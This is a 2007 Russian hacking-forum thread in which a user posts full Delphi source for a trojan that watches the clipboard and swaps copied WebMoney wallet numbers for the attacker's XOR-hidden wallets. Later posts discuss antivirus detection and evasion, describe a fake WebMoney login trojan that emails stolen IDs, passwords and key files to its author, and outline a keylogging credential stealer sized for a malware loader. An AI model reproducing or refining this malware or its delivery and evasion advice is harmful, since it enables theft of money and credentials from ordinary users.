Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   С/С++, C#, Delphi, .NET, Asm (https://forum.antichat.xyz/forumdisplay.php?f=24)
-   -   Wm шалость (https://forum.antichat.xyz/showthread.php?t=42733)

Joker-jar 21.06.2007 09:29
Wm шалость
 
Написал небольшую программку. Суть такова: висит себе тихонько на компе жертвы, при копировании в буфер обмена номера R или Z кошелька (ИМХО самый распространенный метод ввода кошелей в кипер) заменяет их на заранее заготовленные номерки. В итоге жертва вставляет не скопированный, а Ваш номер кошеля :)
В программе для демонстрации вшиты кошельки

R123456789101
Z123456789101

(придумал наобум)

скачать

Пароль: antichat.ru

Если понравится, выложу исходники (Писал на Delphi + KOL).

Хочу предупредить, что программа написана в целях демонстрации опасности данного метода обмана пользователя, а не, собственно, обмана :)

-Time- 21.06.2007 09:42
Сорцы скинь..

vii 21.06.2007 09:53
Цитата:
Joker-jar смотри 4 анивиря палят его!

AhnLab-V3 2007.6.21.1 06.21.2007 no virus found
AntiVir 7.4.0.34 06.20.2007 no virus found
Authentium 4.93.8 06.21.2007 no virus found
Avast 4.7.997.0 06.20.2007 no virus found
AVG 7.5.0.467 06.20.2007 no virus found
BitDefender 7.2 06.21.2007 no virus found
CAT-QuickHeal 9.00 06.21.2007 no virus found
ClamAV devel-20070416 06.21.2007 no virus found
DrWeb 4.33 06.20.2007 no virus found
eSafe 7.0.15.0 06.20.2007 suspicious Trojan/Worm
eTrust-Vet 30.8.3730 06.20.2007 no virus found
Ewido 4.0 06.20.2007 no virus found
FileAdvisor 1 06.21.2007 no virus found
Fortinet 2.91.0.0 06.21.2007 no virus found
F-Prot 4.3.2.48 06.21.2007 no virus found
F-Secure 6.70.13030.0 06.20.2007 no virus found
Ikarus T3.1.1.8 06.21.2007 Trojan.Delf.NEB
Kaspersky 4.0.2.24 06.21.2007 no virus found
McAfee 5057 06.20.2007 no virus found
Microsoft 1.2607 06.21.2007 TrojanDownloader:Win32/Small.OE
Norman 5.80.02 06.20.2007 no virus found
Panda 9.0.0.4 06.20.2007 Suspicious file
Prevx1 V2 06.21.2007 no virus found
Sophos 4.18.0 06.12.2007 no virus found
Sunbelt 2.2.907.0 06.09.2007 no virus found
Symantec 10 06.21.2007 no virus found
TheHacker 6.1.6.136 06.20.2007 no virus found
VBA32 3.12.0.2 06.20.2007 no virus found
VirusBuster 4.3.23:9 06.20.2007 no virus found
Webwasher-Gateway 6.0.1 06.20.2007 no virus found
Стоит вопрос ты туда больше не чего не впарил?

Цитата:
Но за идею молодец!(хорошая идея!)

Joker-jar 21.06.2007 09:56
Не впарил. А вот беда паблика в том, что первым делом все попадает на вирустотал => в базы антивиров. Вы что, вообще не доверяете антивиру, который стоит на Вашей машине?

_Great_ 21.06.2007 09:57
Такое уже было.
ЗЫ. Перенесено в С/С++/Дельфи/Асм

_Great_ 21.06.2007 10:17
Посчитал, что закрывать все-таки не стоит =)

Joker-jar 21.06.2007 10:26
=) Гы, спс! Исходник программы:

Код:
program wmb;

uses
  Windows, KOL;

const
  wmr = '\?<=:;8967?>?'; // hidestring('R123456789101', 14)
  wmz = 'G,/.)(+*%$,-,'; // hidestring('Z123456789101', 29)

type
  Twm = (Unknown, R, Z);

var
  Timer: PTimer;
  Mes: msg;

function hidestring(s: string; code: integer): string;
var
  t: Integer;
begin
  for t:=1 to Length(S) do S[t]:=Chr(Ord(S[t]) xor Code);
    Result:=S;
end;

function getwmtype(s: string): Twm;
var
  c: char;
  e: integer;
  i: int64;
begin
  result := Unknown;
  c := upcase(s[1]);
  if (length(s) <> 13) and (c <> chr($52)) and (c <> chr($5a)) then
    exit;
  if c = chr($52) then
    result := R
  else
    result := Z;
  delete(s,1,1);
  val(s,i,e);
  if e <> 0 then
    result := Unknown;
end;

procedure OnTimer(Sender: PControl);
var
  s: string;
begin
  if getwmtype(Clipboard2Text) = R then
    Text2Clipboard(hidestring(wmr, 14))
  else
    if getwmtype(Clipboard2Text) = Z then
      Text2Clipboard(hidestring(wmz, 29));
end;

begin
  Timer := NewTimer(200);
  Timer.OnTimer := TOnEvent(MakeMethod(nil,@OnTimer));
  Timer.Enabled := true;
  while (GetMessage(Mes, 0, 0, 0)) do
    begin
      TranslateMessage(Mes);
      DispatchMessage(Mes);
    end;
end.
Хоть, как сказал _Great_, такое уже было (я видать в то время под стол ходил), думаю, не все знают о данной фишке. Попасться реально легко (не считая сложностей впаривания), будьте внимательны

NetMan 21.06.2007 11:53
Joker-jar > можно и на чистый WinAPI переделать (see SetTimer).

slesh 21.06.2007 12:09
я гдето уже видел подобное.
Прога поддерживала рабту с: WM: Z, R, E, U, yandex, e-gold
И звалась она помойму WmSpy

Вот тока много толку от этоге может и небыть.
Потому что после того как человек заметит что деньги ушли кудато не туда.
То он посмотрит историю платежей, где будет светится твой кошелек.
И потом могут быть проблемы с этим.

Fire3d 21.06.2007 13:41
Цитата:
Сообщение от slesh
я гдето уже видел подобное.
Прога поддерживала рабту с: WM: Z, R, E, U, yandex, e-gold
И звалась она помойму WmSpy

Вот тока много толку от этоге может и небыть.
Потому что после того как человек заметит что деньги ушли кудато не туда.
То он посмотрит историю платежей, где будет светится твой кошелек.
И потом могут быть проблемы с этим.
А я про что ))) Так что эти трояны так побаловатся.... к примеру на друзьями )))

TaNkist 21.06.2007 15:11
http://forum.antichat.ru/thread40090.html -- тут тоже самое только на C

GoreMaster 21.06.2007 15:30
Цитата:
эти трояны так побаловатся
ога...а потом блэки с логами...
-"Я перевел тебе деньги!"
-"Я ничего не получал...Все пишу блэк..."
З.Ы.:с подменой кошелей в буфере не писал трои только ленивый...^_^

X-zone 21.06.2007 16:00
У меня 2 таких троя на делпхи на визуалбайсик. 1-здесь нет остальных кошельков U,B,E.
2-Она некопируеца в системные папки и незалезает в авто запуск и непрячется от Alt+Ctrl+Del. Так что это трой безпозлезно распространять. Он тока на один раз запуска троя.Все трои с заменой кошелей старые им уж года 3 как я помню.

Joker-jar 21.06.2007 16:32
Радует то, что большинство знают о данной шалости. Если есть подозрения на то, что комп спидозный, обязательно смотрите что копируете, а что вставляете (одного раза может вполне хватить).

З.Ы. Согласен, что прога не годится для практических действий, но я этого и не добивался =)

GlobaL 22.06.2007 11:46
2 vii долбаеп зачем на тотал то сувать?

Xserg 22.06.2007 13:33
Цитата:
Сообщение от GlobaL
2 vii долбаеп зачем на тотал то сувать?
Во первых зря ты оскорбил человека.
Это его личное дело , что , где и как проверять.

Во вторых , автор выложил исходники , кому нужно подправят и перекомпилят.

В третьих , лучше будет продаваться твой безпалевный криптор.

В четвертых , не нравятся антивирусы и фаерволы, отсылай на проверку их системные файлы, пуст палят друг друга.

X-zone 22.06.2007 16:31
Народ хотел спросить совета. Я написал wm троя на делфи с оригинальным дизайном самой webmoney тока при вводе wmid и паса все приходит мне на мыло и ключи kwm и пасс кнему тоже на мыло сливается. При запуске автоматическии заменяет оргинал в webmoney.exe на троян. и тд. Но есть одно но, файл трояна весит 244кб в зжатом состоянии сжимал Upack. Как зделать размер поменьше чтоб на лоадер можно было ставить?. Можно ли готовый проэкт переделать в KOL. Кто знает как все это замутить.

slesh 22.06.2007 17:01
2 X-zone Ты попробуй сделать чуть по другому.
Пусть твой троян будет очень маленький. и его функции быдут такими:
1) стырит ключь
2) запустит реальный WM и поставит на него ловушку для клавы
3) стырит пас.
4) отошлет все на мыло.

Тем самым размер - мининум. и работоспособность не теряется

Piflit 22.06.2007 17:04
slesh, а разве в WM кипере нету антихука?

X-zone 22.06.2007 17:09
Цитата:
Сообщение от slesh
2 X-zone Ты попробуй сделать чуть по другому.
Пусть твой троян будет очень маленький. и его функции быдут такими:
1) стырит ключь
2) запустит реальный WM и поставит на него ловушку для клавы
3) стырит пас.
4) отошлет все на мыло.

Тем самым размер - мининум. и работоспособность не теряется

Я в курсе про этот алгоритм работы это будет следующая моя прога.Но дело в том чтоя хочу оптимизировать этот проект который зделал невыкидвать же его тока изза больщого размера.Пока его некто непалит вот что хорошо.

Piflit 22.06.2007 17:12
244кб на лоадер - это слишком много? сколько вообще на лоадер можно мах ставить?

X-zone 22.06.2007 17:22
На лоадер чем меньше тем лучше желетельно от 1байта до 100кб золотая середина.

AdReNa1!Ne 23.06.2007 11:18
эмм... А в свой кошель-то чел зайдет вместе с твоим троем? Или это чисто как обманка?
Сделай какой-нить фейк, имитирующий заход в wmid.

kaunet 23.06.2007 17:29
хм...недавно отправлял деньги и забыл поставить букву Z перед кошельком (копировал из буфера), стер, и копировал правильно, но кипер ругнулся что произошла подмена кошельков или что то в этом роде
как ты решил эту проблему?

GoreMaster 23.06.2007 18:15
Цитата:
как ты решил эту проблему?
Дык подмена происходит прямо в буфере...а не в полях ввода кипера...а вот если подменивать в полях ввода,то тогда кипер будет ругаться...(%
З.Ы.:сейчас уже трои с автозаливом WM есть...причем картинки убираются легко и просто :P Но если такой трой попадет в пабл,то писец =\

Retscan 23.06.2007 20:05
У меня самого такой обнаружился - долго матерился, когда ни один антивирь не брал его.

X-zone 23.06.2007 20:19
Это и есть фэйк мой трой имитирует вход в webmoney с вводом wmid и пароля после ввода идет отправка на мыло потом открываекца окно где нада указать ключь и написать пасс к нему и все это идет на мыло тоже. Дизайн ничем неотличаеца от оригинала вебмоней тока нада размеры снизить и троян будет завершен.


Время: 19:00